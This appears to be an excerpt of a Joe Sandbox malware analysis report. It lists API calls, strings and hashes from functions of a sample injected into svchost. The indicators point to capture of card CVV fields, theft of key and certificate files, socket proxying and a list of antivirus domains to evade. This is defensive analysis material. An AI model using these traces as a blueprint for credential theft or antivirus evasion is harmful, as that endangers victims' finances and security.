                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_2bb0000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Path$ErrorFileLast$BackslashCreate$AdminAttributesDeleteDirectoryFolderHandleMakeSystemUser$CloseInformationThread
                                                                                                                                                                                                                • String ID: 617D7280$pass.log$path.txt$prv_key.pfx
                                                                                                                                                                                                                • API String ID: 448721894-991073507
                                                                                                                                                                                                                • Opcode ID: e10d9a2e3b1b462cecf1fe1bb88f87c716dcd74c8f9d48cbe0601735c7aaf50e
                                                                                                                                                                                                                • Instruction ID: a40e008f5cdfc6789f2f42f2f1a239d3e3b5d395a1176d1a2df148f7235146ba
                                                                                                                                                                                                                • Opcode Fuzzy Hash: e10d9a2e3b1b462cecf1fe1bb88f87c716dcd74c8f9d48cbe0601735c7aaf50e
                                                                                                                                                                                                                • Instruction Fuzzy Hash: FC712535A402059FDB218F38D858BFA7BE9EF45740F5486DAFA85C7240DB70DA45CB90
                                                                                                                                                                                                                Function 02BCD26C Relevance: 42.3, APIs: 17, Strings: 7, Instructions: 259fileCOMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • GetFileAttributesA.KERNEL32(?), ref: 02BCD278
                                                                                                                                                                                                                • StrStrIA.SHLWAPI(?,found.), ref: 02BCD293
                                                                                                                                                                                                                • StrStrIA.SHLWAPI(?,asus), ref: 02BCD2AE
                                                                                                                                                                                                                • PathAddBackslashA.SHLWAPI(617D73AC), ref: 02BCD2D4
                                                                                                                                                                                                                • CreateDirectoryA.KERNEL32(?,00000000), ref: 02BCD30E
                                                                                                                                                                                                                • GetLastError.KERNEL32 ref: 02BCD318
                                                                                                                                                                                                                • IsUserAnAdmin.SHELL32 ref: 02BCD320
                                                                                                                                                                                                                • PathMakeSystemFolderA.SHLWAPI(?), ref: 02BCD32F
                                                                                                                                                                                                                • SetLastError.KERNEL32(00000000), ref: 02BCD336
                                                                                                                                                                                                                • PathAddBackslashA.SHLWAPI(617D73AC,?,?), ref: 02BCD3D9
                                                                                                                                                                                                                • CreateDirectoryA.KERNEL32(?,00000000), ref: 02BCD413
                                                                                                                                                                                                                • GetLastError.KERNEL32 ref: 02BCD41D
                                                                                                                                                                                                                • IsUserAnAdmin.SHELL32 ref: 02BCD425
                                                                                                                                                                                                                • PathMakeSystemFolderA.SHLWAPI(?), ref: 02BCD434
                                                                                                                                                                                                                • SetLastError.KERNEL32(00000000), ref: 02BCD43B
                                                                                                                                                                                                                • FindNextFileA.KERNEL32(?,?), ref: 02BCD52F
                                                                                                                                                                                                                • SetErrorMode.KERNEL32(?), ref: 02BCD563
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.2655337628.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_2bb0000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Error$LastPath$AdminBackslashCreateDirectoryFileFolderMakeSystemUser$AttributesFindModeNext
                                                                                                                                                                                                                • String ID: .txt$.zip$617D73AC$asus$found.$keys$path
                                                                                                                                                                                                                • API String ID: 2233314381-3492321697
                                                                                                                                                                                                                • Opcode ID: 84fcb77d55f407c6100ba25c9e6472c27e50e7e880574c125f58b80588f56f23
                                                                                                                                                                                                                • Instruction ID: b56ec25e905ebdfc358b44389a83a9ed3b9076637d492f3544f602d54e6bf4fb
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 84fcb77d55f407c6100ba25c9e6472c27e50e7e880574c125f58b80588f56f23
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 1491F7345087468FCB25CB3894686ABBBE5EFC9345F188AACF9C6C7201EB31D549C791
                                                                                                                                                                                                                Function 02BD4018 Relevance: 40.6, APIs: 17, Strings: 6, Instructions: 313COMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • PathAddBackslashA.SHLWAPI(02C0D19C), ref: 02BD4037
                                                                                                                                                                                                                • CreateDirectoryA.KERNEL32(?,00000000), ref: 02BD4075
                                                                                                                                                                                                                • GetLastError.KERNEL32 ref: 02BD407F
                                                                                                                                                                                                                • IsUserAnAdmin.SHELL32 ref: 02BD4087
                                                                                                                                                                                                                • PathMakeSystemFolderA.SHLWAPI(?), ref: 02BD4098
                                                                                                                                                                                                                • SetLastError.KERNEL32(00000000), ref: 02BD409F
                                                                                                                                                                                                                • StrStrIA.SHLWAPI(00000000,?), ref: 02BD40FD
                                                                                                                                                                                                                • GetFileAttributesA.KERNEL32(00000000), ref: 02BD410C
                                                                                                                                                                                                                • PathAddBackslashA.SHLWAPI(02C0D19C), ref: 02BD4137
                                                                                                                                                                                                                • _snprintf.MSVCRT ref: 02BD4197
                                                                                                                                                                                                                • PathAddBackslashA.SHLWAPI(02C0D19C,?,00000000), ref: 02BD41D7
                                                                                                                                                                                                                • _snprintf.MSVCRT ref: 02BD4237
                                                                                                                                                                                                                • PathAddBackslashA.SHLWAPI(02C0D19C), ref: 02BD4297
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.2655337628.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_2bb0000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Path$Backslash$ErrorLast_snprintf$AdminAttributesCreateDirectoryFileFolderMakeSystemUser
                                                                                                                                                                                                                • String ID: Local\{EAF7722F-8989-4fe1-977D-95CD777C0214}$P0Wu$keys%i.zip$keys.zip$path%i.txt$path.txt
                                                                                                                                                                                                                • API String ID: 2433436401-2965714029
                                                                                                                                                                                                                • Opcode ID: 87d53c091b9a0a839ae20097c293b5c05064792924f38c829254031ef4bfbc85
                                                                                                                                                                                                                • Instruction ID: d1b68cb65edd705c3b9f1cdcbce307dcf471cd9f3526383d3e65103712062aab
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 87d53c091b9a0a839ae20097c293b5c05064792924f38c829254031ef4bfbc85
                                                                                                                                                                                                                • Instruction Fuzzy Hash: ACB1FD3090064A5BDB2ACB7C98697FA7BF5FF49340F1489E4E996D7240FB719948C740
                                                                                                                                                                                                                Function 02BBDA20 Relevance: 38.7, APIs: 21, Strings: 1, Instructions: 192filesynchronizationmemoryCOMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • GetTickCount.KERNEL32 ref: 02BBDA2D
                                                                                                                                                                                                                • HeapCreate.KERNEL32(00000000,00000000,00000000), ref: 02BBDA3E
                                                                                                                                                                                                                  • Part of subcall function 02BBD970: GetComputerNameA.KERNEL32(02BFF588,?), ref: 02BBD987
                                                                                                                                                                                                                  • Part of subcall function 02BBD970: lstrlenA.KERNEL32(02BFF588,?,?,02BC76EC), ref: 02BBD992
                                                                                                                                                                                                                  • Part of subcall function 02BBD970: wsprintfA.USER32 ref: 02BBD9D2
                                                                                                                                                                                                                  • Part of subcall function 02BBD970: wsprintfA.USER32 ref: 02BBD9E2
                                                                                                                                                                                                                  • Part of subcall function 02BBD970: wsprintfA.USER32 ref: 02BBD9F2
                                                                                                                                                                                                                  • Part of subcall function 02BBD970: wsprintfA.USER32 ref: 02BBD9FF
                                                                                                                                                                                                                  • Part of subcall function 02BBD970: wsprintfA.USER32 ref: 02BBDA0C
                                                                                                                                                                                                                • CreateFileMappingA.KERNEL32(000000FF,00000000,00000004,00000000,00002939,02BFF5A0), ref: 02BBDA6A
                                                                                                                                                                                                                • MapViewOfFile.KERNEL32(00000000,000F001F,00000000,00000000,00000000), ref: 02BBDA83
                                                                                                                                                                                                                  • Part of subcall function 02BB9020: SetThreadDesktop.USER32(?,7556F590,755616B0,?), ref: 02BB902F
                                                                                                                                                                                                                  • Part of subcall function 02BB9020: GetDC.USER32(00000000), ref: 02BB9037
                                                                                                                                                                                                                  • Part of subcall function 02BB9020: GetDeviceCaps.GDI32(00000000,0000000A), ref: 02BB9048
                                                                                                                                                                                                                  • Part of subcall function 02BB9020: GetDeviceCaps.GDI32(00000000,00000008), ref: 02BB9059
                                                                                                                                                                                                                  • Part of subcall function 02BB9020: CreateCompatibleBitmap.GDI32(00000000,00000000,?), ref: 02BB9070
                                                                                                                                                                                                                  • Part of subcall function 02BB9020: GetDIBits.GDI32(00000000,00000000,00000000,00000001,00000000,?,00000000), ref: 02BB90B2
                                                                                                                                                                                                                  • Part of subcall function 02BB9020: GetDIBits.GDI32(00000000,00000000,00000000,00000001,00000000,00000028,00000000), ref: 02BB90C2
                                                                                                                                                                                                                  • Part of subcall function 02BB9020: DeleteObject.GDI32(00000000), ref: 02BB90C5
                                                                                                                                                                                                                  • Part of subcall function 02BB9020: ReleaseDC.USER32(00000000,00000000), ref: 02BB90CE
                                                                                                                                                                                                                  • Part of subcall function 02BB9020: HeapFree.KERNEL32(00000000,00000000,00000000), ref: 02BB9129
                                                                                                                                                                                                                • CreateFileMappingA.KERNEL32(000000FF,00000000,00000004,00000000,?,02BFF54C), ref: 02BBDAB0
                                                                                                                                                                                                                • MapViewOfFile.KERNEL32(00000000,000F001F,00000000,00000000,00000000), ref: 02BBDAC3
                                                                                                                                                                                                                • CreateMutexA.KERNEL32(00000000,00000000,02BFF670), ref: 02BBDAE1
                                                                                                                                                                                                                • ConvertStringSecurityDescriptorToSecurityDescriptorW.ADVAPI32(S:(ML;;NRNWNX;;;LW),00000001,00000000,00000000), ref: 02BBDAFF
                                                                                                                                                                                                                • GetSecurityDescriptorSacl.ADVAPI32(00000000,?,?,?), ref: 02BBDB20
                                                                                                                                                                                                                • SetNamedSecurityInfoA.ADVAPI32(02BFF670,00000006,00000010,00000000,00000000,00000000,00000000), ref: 02BBDB3D
                                                                                                                                                                                                                • LocalFree.KERNEL32(00000000), ref: 02BBDB47
                                                                                                                                                                                                                • CreateMutexA.KERNEL32(00000000,00000000,00000000), ref: 02BBDB61
                                                                                                                                                                                                                • CreateMutexA.KERNEL32(00000000,00000000,02BFF630), ref: 02BBDB79
                                                                                                                                                                                                                • ConvertStringSecurityDescriptorToSecurityDescriptorW.ADVAPI32(S:(ML;;NRNWNX;;;LW),00000001,?,00000000), ref: 02BBDB97
                                                                                                                                                                                                                • GetSecurityDescriptorSacl.ADVAPI32(?,?,00000000,?), ref: 02BBDBB8
                                                                                                                                                                                                                • SetNamedSecurityInfoA.ADVAPI32(02BFF630,00000006,00000010,00000000,00000000,00000000,00000000), ref: 02BBDBD5
                                                                                                                                                                                                                • LocalFree.KERNEL32(?), ref: 02BBDBDF
                                                                                                                                                                                                                • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 02BBDBFD
                                                                                                                                                                                                                • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 02BBDC10
                                                                                                                                                                                                                • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 02BBDC23
                                                                                                                                                                                                                • CreateEventA.KERNEL32(00000000,00000000,00000000,02BFF5DC), ref: 02BBDC39
                                                                                                                                                                                                                  • Part of subcall function 02BD5930: GetCurrentThread.KERNEL32 ref: 02BD5940
                                                                                                                                                                                                                  • Part of subcall function 02BD5930: OpenThreadToken.ADVAPI32(00000000,?,?,?,?,02BC4D1B,?,?,00000000), ref: 02BD5947
                                                                                                                                                                                                                  • Part of subcall function 02BD5930: GetCurrentProcess.KERNEL32(00000020,02BC4D1B,?,?,?,?,02BC4D1B,?,?,00000000), ref: 02BD5957
                                                                                                                                                                                                                  • Part of subcall function 02BD5930: OpenProcessToken.ADVAPI32(00000000,?,?,?,?,02BC4D1B,?,?,00000000), ref: 02BD595E
                                                                                                                                                                                                                  • Part of subcall function 02BD5930: LookupPrivilegeValueA.ADVAPI32(00000000,SeSecurityPrivilege,?), ref: 02BD5981
                                                                                                                                                                                                                  • Part of subcall function 02BD5930: AdjustTokenPrivileges.KERNELBASE(02BC4D1B,00000000,00000001,00000000,00000000,00000000), ref: 02BD599B
                                                                                                                                                                                                                  • Part of subcall function 02BD5930: GetLastError.KERNEL32 ref: 02BD59A5
                                                                                                                                                                                                                  • Part of subcall function 02BD5930: CloseHandle.KERNEL32(02BC4D1B), ref: 02BD59B6
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.2655337628.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_2bb0000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Create$Security$Descriptor$wsprintf$EventFile$FreeMutexThreadToken$BitsCapsConvertCurrentDeviceHeapInfoLocalMappingNamedOpenProcessSaclStringView$AdjustBitmapCloseCompatibleComputerCountDeleteDesktopErrorHandleLastLookupNameObjectPrivilegePrivilegesReleaseTickValuelstrlen
                                                                                                                                                                                                                • String ID: S:(ML;;NRNWNX;;;LW)
                                                                                                                                                                                                                • API String ID: 3555772620-820036962
                                                                                                                                                                                                                • Opcode ID: 42ac57b92071214429b01ef6dbb1e150c22055e3cff6698e8fa3ff40fe6745af
                                                                                                                                                                                                                • Instruction ID: df667d3627288c3f3d38006f7ae830320e32ece895f1b270dee6159822760511
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 42ac57b92071214429b01ef6dbb1e150c22055e3cff6698e8fa3ff40fe6745af
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 6F517B71FC0306BAF7719BA49C86FAA77A8AF44B41F104585B701EB2C0DBF4A5108F65
                                                                                                                                                                                                                Function 02BCE3F0 Relevance: 36.9, APIs: 14, Strings: 7, Instructions: 145memorystringthreadCOMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • StrStrIA.SHLWAPI(00000000,&cvv=,00000000,7556F380,00000000,00000001,00000000,?,?,?,02BC8A44,?,?,?,?,?), ref: 02BCE433
                                                                                                                                                                                                                • StrStrIA.SHLWAPI(00000000,&cvv=&,?,?,02BC8A44,?,?,?,?,?,?), ref: 02BCE441
                                                                                                                                                                                                                • StrStrIA.SHLWAPI(00000000,&cvv2=,?,?,02BC8A44,?,?,?,?,?,?), ref: 02BCE44D
                                                                                                                                                                                                                • StrStrIA.SHLWAPI(00000000,&cvv2=&,?,?,02BC8A44,?,?,?,?,?,?), ref: 02BCE45B
                                                                                                                                                                                                                • StrStrIA.SHLWAPI(00000000,&cvc=,?,?,02BC8A44,?,?,?,?,?,?), ref: 02BCE467
                                                                                                                                                                                                                • StrStrIA.SHLWAPI(00000000,&cvc=&,?,?,02BC8A44,?,?,?,?,?,?), ref: 02BCE479
                                                                                                                                                                                                                • strstr.MSVCRT ref: 02BCE48F
                                                                                                                                                                                                                • strstr.MSVCRT ref: 02BCE4A2
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000008,-00000011,?,?,?,?,?,?,?,?,?,?), ref: 02BCE50B
                                                                                                                                                                                                                • HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?), ref: 02BCE512
                                                                                                                                                                                                                • memset.MSVCRT ref: 02BCE522
                                                                                                                                                                                                                • CreateThread.KERNEL32(00000000,00000000,02BCE580,00000000,00000000,00000000), ref: 02BCE548
                                                                                                                                                                                                                • GetHandleInformation.KERNEL32(00000000,?), ref: 02BCE560
                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 02BCE571
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.2655337628.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_2bb0000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: HandleHeapstrstr$AllocCloseCreateInformationProcessThreadmemset
                                                                                                                                                                                                                • String ID: &cvc=$&cvc=&$&cvv2=$&cvv2=&$&cvv=$&cvv=&$&domain=letitbit.net&
                                                                                                                                                                                                                • API String ID: 1632825432-2817208116
                                                                                                                                                                                                                • Opcode ID: 2d47b643c78aeb60bf16da58e376c2c21393b2149405fda625538a2135f564df
                                                                                                                                                                                                                • Instruction ID: 6c05d480452d44691725d6c1e443c69198a0d7adebbaa025fa44fb1d99e5c30a
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 2d47b643c78aeb60bf16da58e376c2c21393b2149405fda625538a2135f564df
                                                                                                                                                                                                                • Instruction Fuzzy Hash: CA416831A40B11AFE3220A386C59FAF279DCF45745F7842D8FA84E7252EB61D61983A4
                                                                                                                                                                                                                Function 02BC9B20 Relevance: 36.3, APIs: 24, Instructions: 271networkmemorythreadCOMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,0000000C), ref: 02BC9B39
                                                                                                                                                                                                                • HeapAlloc.KERNEL32(00000000), ref: 02BC9B42
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,0000000C), ref: 02BC9B4C
                                                                                                                                                                                                                • HeapAlloc.KERNEL32(00000000), ref: 02BC9B4F
                                                                                                                                                                                                                • recv.WS2_32(?,?,?,00000000), ref: 02BC9B75
                                                                                                                                                                                                                • send.WS2_32(?,02BF9E4C,00000002,00000000), ref: 02BC9BCC
                                                                                                                                                                                                                • send.WS2_32(?,02BFE1CC,00000002,00000000), ref: 02BC9BF2
                                                                                                                                                                                                                • recv.WS2_32(?,?,00000004,00000000), ref: 02BC9C18
                                                                                                                                                                                                                • recv.WS2_32(?,?,00000001,00000000), ref: 02BC9C92
                                                                                                                                                                                                                • gethostbyname.WS2_32(00000005), ref: 02BC9CC7
                                                                                                                                                                                                                • recv.WS2_32(?,?,00000002,00000000), ref: 02BC9D0D
                                                                                                                                                                                                                • recv.WS2_32(?,?,00000004,00000000), ref: 02BC9D24
                                                                                                                                                                                                                • inet_ntoa.WS2_32(?), ref: 02BC9D37
                                                                                                                                                                                                                • recv.WS2_32(?,?,00000002,00000000), ref: 02BC9D47
                                                                                                                                                                                                                • htons.WS2_32(?), ref: 02BC9D5A
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000005), ref: 02BC9D67
                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000), ref: 02BC9D6E
                                                                                                                                                                                                                • socket.WS2_32(00000002,00000001,00000006), ref: 02BC9D7A
                                                                                                                                                                                                                • connect.WS2_32(?,?,00000010), ref: 02BC9D9C
                                                                                                                                                                                                                • send.WS2_32(?,?,0000000A,00000000), ref: 02BC9DB6
                                                                                                                                                                                                                • send.WS2_32(?,?,0000000A,00000000), ref: 02BC9DD0
                                                                                                                                                                                                                • CreateThread.KERNEL32(00000000,00000000,02BC9970,?,00000000,00000000), ref: 02BC9DEA
                                                                                                                                                                                                                • recv.WS2_32(?,?,?,00000000), ref: 02BC9CBC
                                                                                                                                                                                                                  • Part of subcall function 02BC98F0: shutdown.WS2_32(?,00000001), ref: 02BC990B
                                                                                                                                                                                                                  • Part of subcall function 02BC98F0: shutdown.WS2_32(02BC99EC,00000001), ref: 02BC9910
                                                                                                                                                                                                                  • Part of subcall function 02BC98F0: recv.WS2_32(02BC99EC,?,00000400,00000000), ref: 02BC992F
                                                                                                                                                                                                                  • Part of subcall function 02BC98F0: recv.WS2_32(?,?,00000400,00000000), ref: 02BC9945
                                                                                                                                                                                                                  • Part of subcall function 02BC98F0: closesocket.WS2_32(?), ref: 02BC9959
                                                                                                                                                                                                                  • Part of subcall function 02BC98F0: closesocket.WS2_32(02BC99EC), ref: 02BC995C
                                                                                                                                                                                                                  • Part of subcall function 02BC98F0: ExitThread.KERNEL32 ref: 02BC9960
                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 02BC9DFC
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.2655337628.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_2bb0000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: recv$Heap$send$Process$AllocThreadclosesocketshutdown$CloseCreateExitFreeHandleconnectgethostbynamehtonsinet_ntoasocket
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 699211285-0
                                                                                                                                                                                                                • Opcode ID: 464f55130aef19571fea108311acb62740dd3e672f40c0e3442866846667ad97
                                                                                                                                                                                                                • Instruction ID: ea03bcc03c383b92d390e7d23d3935b92d2247291f021160b5509921a45309a4
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 464f55130aef19571fea108311acb62740dd3e672f40c0e3442866846667ad97
                                                                                                                                                                                                                • Instruction Fuzzy Hash: A891AEB1648740BEF320EB748C85F7BBB99EB84740F64594DF682A7182D7B4E444CB62
                                                                                                                                                                                                                Function 02BB61B0 Relevance: 36.1, APIs: 12, Strings: 12, Instructions: 71COMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • StrStrIW.SHLWAPI(?,avast.com,?,?,02BB62EC), ref: 02BB61CB
                                                                                                                                                                                                                • StrStrIW.SHLWAPI(?,kaspersky,?,?,02BB62EC), ref: 02BB61DB
                                                                                                                                                                                                                • StrStrIW.SHLWAPI(?,drweb,?,?,02BB62EC), ref: 02BB61E7
                                                                                                                                                                                                                • StrStrIW.SHLWAPI(?,eset.com,?,?,02BB62EC), ref: 02BB61F3
                                                                                                                                                                                                                • StrStrIW.SHLWAPI(?,antivir,?,?,02BB62EC), ref: 02BB61FF
                                                                                                                                                                                                                • StrStrIW.SHLWAPI(?,avira,?,?,02BB62EC), ref: 02BB620B
                                                                                                                                                                                                                • StrStrIW.SHLWAPI(?,virustotal,?,?,02BB62EC), ref: 02BB6217
                                                                                                                                                                                                                • StrStrIW.SHLWAPI(?,virusinfo,?,?,02BB62EC), ref: 02BB6223
                                                                                                                                                                                                                • StrStrIW.SHLWAPI(?,z-oleg.com,?,?,02BB62EC), ref: 02BB622F
                                                                                                                                                                                                                • StrStrIW.SHLWAPI(?,trendsecure,?,?,02BB62EC), ref: 02BB623B
                                                                                                                                                                                                                • StrStrIW.SHLWAPI(?,anti-malware,?,?,02BB62EC), ref: 02BB6247
                                                                                                                                                                                                                • StrStrIW.SHLWAPI(?,.comodo.com,?,?,02BB62EC), ref: 02BB6253
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.2655337628.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_2bb0000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                • String ID: .comodo.com$anti-malware$antivir$avast.com$avira$drweb$eset.com$kaspersky$trendsecure$virusinfo$virustotal$z-oleg.com
                                                                                                                                                                                                                • API String ID: 0-375433535
                                                                                                                                                                                                                • Opcode ID: e68933dc23c084e55b969b404f6e66dc13f96caa5fa700494cd1ac5e9e524ca7
                                                                                                                                                                                                                • Instruction ID: c4686c5c700d1ec9a7c85216a8cb99de67eca427b8818a6312c2fdf93ce7a5d9
                                                                                                                                                                                                                • Opcode Fuzzy Hash: e68933dc23c084e55b969b404f6e66dc13f96caa5fa700494cd1ac5e9e524ca7
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 62017DA6B8671624767231298C61FEF478C9FC1E8A78206E4FB45F1014F7C5DA070979
                                                                                                                                                                                                                Function 00403050 Relevance: 35.4, APIs: 18, Strings: 2, Instructions: 436commemoryCOMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • CoInitializeEx.OLE32(00000000,00000000,?,?,7702DB30), ref: 00403060
                                                                                                                                                                                                                • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000006,00000003,00000000,00000000,00000000), ref: 00403080
                                                                                                                                                                                                                • CoCreateInstance.OLE32(00404418,00000000,00000001,00404208,?), ref: 004030A7
                                                                                                                                                                                                                • VariantInit.OLEAUT32(?), ref: 004030BF
                                                                                                                                                                                                                • VariantInit.OLEAUT32(?), ref: 004030DA
                                                                                                                                                                                                                • VariantInit.OLEAUT32(?), ref: 004030F8
                                                                                                                                                                                                                • VariantInit.OLEAUT32(?), ref: 00403116
                                                                                                                                                                                                                • VariantClear.OLEAUT32(?), ref: 0040319C
                                                                                                                                                                                                                • VariantClear.OLEAUT32(?), ref: 004031A2
                                                                                                                                                                                                                • VariantClear.OLEAUT32(?), ref: 004031A8
                                                                                                                                                                                                                • VariantClear.OLEAUT32(?), ref: 004031AE
                                                                                                                                                                                                                • InterlockedDecrement.KERNEL32(004036D6), ref: 004031ED
                                                                                                                                                                                                                • SysAllocString.OLEAUT32(00404F4C), ref: 00403396
                                                                                                                                                                                                                • VariantInit.OLEAUT32(?), ref: 004033BB
                                                                                                                                                                                                                • VariantInit.OLEAUT32(?), ref: 004033D9
                                                                                                                                                                                                                  • Part of subcall function 00402F70: GetProcessHeap.KERNEL32(00000008,00000010,00000000,?,004031C1,00404F38), ref: 00402F78
                                                                                                                                                                                                                  • Part of subcall function 00402F70: HeapAlloc.KERNEL32(00000000,?,004031C1,00404F38), ref: 00402F7F
                                                                                                                                                                                                                  • Part of subcall function 00402F70: SysAllocString.OLEAUT32(004031C1), ref: 00402FA0
                                                                                                                                                                                                                • VariantClear.OLEAUT32(?), ref: 00403486
                                                                                                                                                                                                                • VariantClear.OLEAUT32(?), ref: 0040348C
                                                                                                                                                                                                                • VariantClear.OLEAUT32(?), ref: 00403492
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.2639699727.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.2639699727.000000000045E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_400000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Variant$Clear$Init$Alloc$HeapInitializeString$CreateDecrementInstanceInterlockedProcessSecurity
                                                                                                                                                                                                                • String ID: cmd.exe$p=5w
                                                                                                                                                                                                                • API String ID: 2839743307-760121691
                                                                                                                                                                                                                • Opcode ID: e8233dde59193e1d0be8b60998d85175095778d30159eae7e9dd8f1d15148535
                                                                                                                                                                                                                • Instruction ID: bf3241a60ff26ee6c0642b95ea0adfafd6aded52afbf6c2e6df27db904542273
